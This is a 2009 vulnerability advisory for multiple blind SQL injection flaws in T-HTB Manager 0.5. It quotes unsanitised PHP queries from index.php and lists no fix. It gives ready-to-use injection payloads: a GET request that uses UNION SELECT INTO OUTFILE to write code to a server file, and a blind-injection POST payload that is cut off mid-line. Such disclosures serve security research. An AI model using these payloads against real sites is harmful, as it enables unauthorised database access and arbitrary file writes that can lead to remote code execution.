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T-HTB Manager Mutiple Blind SQL Injection

********   Salvatore "drosophila" Fresta   ********

[+] Application: T-HTB Manager
[+] Version: 0.5
[+] Website: 

[+] Bugs: [A] Multiple Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 10 Sep 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


[+] Menu

1) Bugs
2) Code
3) Fix


[+] Bugs

- [A] Multiple Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: index.php

All fields in this script are not sanitized but any
outputs aren't returned.


        case 'delete_category':
      $id = $_GET['id'];
      $id_interfaces = $_GET['id_interfaces'];

        $query =  "SELECT rgt, lft FROM ".$table_name." WHERE id='" . $id . "'";
        $db_query = mysql_query($query);

    case 'update_category':
      $name = $_POST['name'];
      $id = $_POST['id'];

      $rate     = $_POST['rate'];
      $ceil     = $_POST['ceil'];
      $burst    = $_POST['burst'];
      $prio     = $_POST['prio'];
      $monitor  = $_POST['monitor'];

      if(strlen($name)>0 && $id>0)
        $nodelft = $_POST['nodelft'];

        $lft = $_POST['lft'];
        $rgt = $_POST['rgt'];

        $query = "UPDATE ".$table_name." set name='" . $name . "' ,  lft='" . 
$lft . "' , rgt = '" . $rgt . "', rate= '" . $rate . "', ceil = '" . $ceil . 
"', burst = '" . $burst . "', prio = '" . $prio . "', monitor = '" . $monitor . 
"' WHERE id='" . $id . "'";

And many others..


[+] Code

- [A] Multiple Blind SQL Injection

This is a Blind SQL Injection bug but into the
database there aren't very reserved information
such as usernames and/or passwords. However this
injection can be used to write arbitrary files
on the server (when allowed).

http://site/path/index.php?action=delete_category&id=1' UNION ALL SELECT 
NULL,'evil code' INTO OUTFILE '/tmp/file.php

Send it as a POST packet:

action=update_category&id=9999&name=blabla' WHERE 1=0 OR IF(ASCII(CHAR(97)) = 


[+] Fix

No fix.
